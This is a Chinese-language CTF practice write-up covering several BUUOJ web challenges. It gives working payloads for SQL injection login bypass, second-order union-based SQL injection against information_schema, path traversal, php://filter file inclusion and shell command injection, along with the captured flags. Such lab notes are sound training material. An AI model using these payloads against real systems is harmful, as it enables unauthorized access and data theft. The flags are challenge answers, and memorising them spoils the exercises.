Bootstrap

buuoj WEB做题笔记

[极客大挑战 2019]EasySQL

password输入存在注入: 123'or 1=1 --'

flag{68144110-18b9-4882-93f1-6f6e7b1c67ec}

[极客大挑战 2019]Havefun

看网页源码,发现尾部有一段注释得代码,尝试 /?cat=dog,回显得flag{01c680f5-0d62-4e2c-a805-cfcf6b9252db}

[极客大挑战 2019]PHP

根据页面提示“我有一个良好的备份网站的习惯”,从网站下载www.zip,发现flag.php,得:Syc{dog_dog_dog_dog}

[HCTF 2018]WarmUp

看页面源码发现有source.php和hint.php。访问source.php,可以看到源码。

/source.php?file=source.php%253f../../../../../ffffllllaaaagggg

flag{4e32d761-238a-429a-88b9-eec7fdaea63f}

October 2019 Twice SQL Injection

审计源码。

1> 使用 1' union select group_concat(table_name) from information_schema.tables where table_schema=database() # 作为用户名,注册,然后登陆,获得三张表名:flag,news,users

2> 使用 1' union select concat(flag) from flag # 作为用户名,注册,然后登陆,获得flag

flag{fa7f6f08-c2cc-4c72-8ed7-1993959cd35c}

[ACTF2020 新生赛]Include

/?file=php://filter/read=convert.base64-encode/resource=flag.php

[ACTF2020 新生赛]Exec

127.0.0.1||ls /   #查看根目录
127.0.0.1||cat /flag  #flag{52d81535-4467-4429-ae0e-ad751e78e6a3}

;